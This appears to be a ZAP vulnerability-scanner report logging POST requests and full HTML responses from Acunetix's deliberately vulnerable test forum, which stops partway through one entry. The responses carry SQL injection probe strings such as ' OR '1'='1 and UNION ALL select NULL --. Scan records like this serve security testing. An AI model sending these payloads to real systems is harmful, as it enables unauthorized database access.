| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3084 |
| Response Body - size: 3,084 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
